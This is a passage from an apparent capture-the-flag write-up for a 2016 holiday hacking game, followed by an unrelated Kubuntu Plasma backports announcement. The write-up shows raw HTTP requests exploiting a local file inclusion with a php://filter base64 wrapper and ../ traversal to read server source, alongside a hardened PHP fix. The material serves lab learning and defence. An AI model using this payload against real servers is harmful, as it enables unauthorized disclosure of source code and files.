  "crashdump" : "crashdump-QKMuKk.php"
}

It turns out there’s also a ReadCrashDump operation to which you can provide a crashdump name, and it will return the contents. You omit the php extension when sending the request, like so:

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 69

{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QKMuKk"}}

Given that I confirmed the crashdumps are in a folder “docs” relative to exception.php, I tried reading the “crashdump” ../exception to see if I could view the source, but that gives a 500 Internal Server Error. (Likely it keeps loading itself in an include() loop.) PHP, however, provides some creative ways to read data, filtering it inline. These pseudo-URLs for file opening result in different encodings and can be quite useful for bypassing LFI filters, non-printable characters for extracting binaries, etc. I chose to use one that encodes a file as base64 to see if I could get the source of exception.php:

POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 109

{"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=../exception"}}

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Sat, 31 Dec 2016 00:56:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3168

PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDog … oZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K

The base64 encoded output is a great sign. I decode it to discover, as expected, the contents of exception.php, which starts with this helpful hint:

<?php
# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

So, there we have our final piece of the discombobulated audio: discombobulatedaudio6.mp3. This particular LFI was interesting for a few reasons: the use of chdir() to change directory instead of prepending the directory name, and the requirement that the file ends in .php. Had they prepended the directory name, a filter could not have been used because the filter must be at the beginning of the string passed to the PHP file open functions (like require, include, fopen).
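The chdir()-then-include lookup shape described above, beside a hardened version of the same lookup, as an added illustration that is not the challenge's exception.php; the function names are mine, and the docs/ folder and the crashdump-XXXXXX name format are assumptions taken from the responses shown:

```php
<?php
// Added illustration, not the challenge's own exception.php. Function names are
// mine; the docs/ folder and the crashdump-XXXXXX name shape are taken from the
// responses shown in the writeup and assumed to be the only valid form.

// Vulnerable shape of the lookup as the writeup describes it: the directory is
// entered with chdir() instead of being prepended, so $name is still the very
// start of the string that include() sees, and a php:// wrapper or ../ in it
// is honoured. The only restriction is the appended ".php".
function read_crashdump_vulnerable(string $name): void
{
    chdir(__DIR__ . '/docs');
    include $name . '.php';
}

// Hardened lookup: allow only the exact name format the server itself issues,
// build the path with the directory prepended, verify the resolved path stayed
// inside that directory, and return the dump as data rather than executing it.
function crashdump_name_is_valid(string $name): bool
{
    return preg_match('/^crashdump-[A-Za-z0-9]{6}$/', $name) === 1;
}

function read_crashdump_hardened(string $name): ?string
{
    if (!crashdump_name_is_valid($name)) {
        return null;   // wrappers, traversal and odd characters never reach the filesystem
    }
    $dir = realpath(__DIR__ . '/docs');
    if ($dir === false) {
        return null;   // dump folder missing
    }
    $real = realpath($dir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($real === false
        || strncmp($real, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return null;   // missing file, or a symlink that escapes the dump folder
    }
    return file_get_contents($real);
}

// The validator on the three names that appear in the writeup
var_dump(crashdump_name_is_valid('crashdump-QKMuKk'));
var_dump(crashdump_name_is_valid('../exception'));
var_dump(crashdump_name_is_valid('php://filter/convert.base64-encode/resource=../exception'));
```

Only the first name passes the validator; with the directory prepended and the name format pinned, there is no position left in the path where a wrapper could appear.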

Part 5: Discombobulated Audio

Fixing the Audio

We now have 7 audio files. Listening to each one, you don’t hear much, but the overall tone suggests to me that the final file has been slowed somewhat. So I open up Audacity and put all the files into one project. Then I used the option “Tracks > Align Tracks > Align End to End” to place the tracks into a series, with the resulting audio concatenated like this:

I wasn’t sure if numerical order would be the right order, but the amplitude of the end of each piece looked similar to the amplitude of the beginning of the next piece and playing the audio sounded rather continuous, but still unintelligible, so I decided to proceed. (I was hoping nobody was going to make me try all 5040 permutations of audio!) I merged the tracks together (via Tracks > Mix and Render) and then changed the tempo (via Effects > Change Tempo) by about 600%. It still didn’t sound quite right, but was close enough that I could make out the message:

“Merry Christmas, Santa Claus, or as I have always known him, Jeff”

It wasn’t clear to me what to do with the audio, or how this would help to find the kidnapper, but since there’s still one door that I didn’t have the password to (the corridor behind Santa’s office), I decided to try and see if this helped with getting past the door.

Santa’s Kidnapper

I was honestly a little surprised when the “Nice” light flashed and I was past the last locked door! As soon as I was through, I was in a small dark room with a ladder going up. I actually hesitated to click up the ladder, because part of me didn’t want the game to be over. But without anything else to do in the game (except collect NetWars coins… that took a little extra time) I clicked up the ladder, expecting a nefarious villain, and finding… Dr. Who?

But why, Dr. Who, why? I can’t, for the life of me, imagine a reason to kidnap Santa Claus and take him back to 1978.

As told in his own words:

<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.

Well, actually, I think I have to agree with the Doctor. The world would be a much better place without the Star Wars Holiday Special, but the ends do not justify the means. However, Santa was returned in time to complete his Christmas rounds and deliver the toys via portal to all the white hat boys and girls of the world. (And perhaps a few of the grey hats too…)

Kubuntu General News: Plasma 5.8.5 bugfix release in Xenial and Yakkety Backports now

Thu, 01/05/2017 - 00:57

Plasma 5.8.5 brings bug-fixes and translations from the month of December, thanks to the hard work of the Plasma team and the KDE Translation team.

To update, use the Software Repository Guide to add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

Instructions on how to manage PPAs and more info about the Kubuntu PPAs can be found in the Repositories Documentation.
